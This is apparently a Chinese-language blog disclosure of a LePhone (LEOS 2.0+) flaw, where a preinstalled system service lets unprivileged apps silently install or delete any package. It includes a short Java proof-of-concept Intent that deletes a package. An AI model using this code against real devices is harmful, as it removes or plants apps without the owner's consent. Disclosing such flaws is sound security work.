乐phone手机任意软件包安装删除漏洞

本文章由Jack_Jia编写，转载请注明出处。
文章链接：http://blog.youkuaiyun.com/jiazhijun/article/details/8639570
作者：Jack_Jia 邮箱：309zhijun@163.com

一、漏洞描述

乐phone手机默认包含一个服务，其设计没有遵照Android安全规范，导致没有声明任何权限的应用即可在没有任何提示情况下通过该服务安装和删除任意软件包，对系统安全性产生极大影响。

二、影响版本

LEOS2.0以上版本

三、漏洞原理

乐phone手机出厂默认包含一个名为jp.aplix.midp.tools的应用包。本应用以system权限运行，并向其他应用提供ApkInstaller服务，用来进行对Apk文件的安装和删除。
通过向ApkInstaller服务传递构造好的参数，没有声明任何权限的应用即可达到安装和删除任意Package的行为，对系统安全性产生极大影响。

四、POC代码

Intent in = new Intent();
in.setComponent(new ComponentName("jp.aplix.midp.tools","jp.aplix.midp.tools.ApkInstaller"));
in.putExtra("action", "deleteApk");
in.putExtra("pkgName", "xxxxx");
startService(in);

五、相关链接

http://www.wooyun.org/bugs/wooyun-2010-0509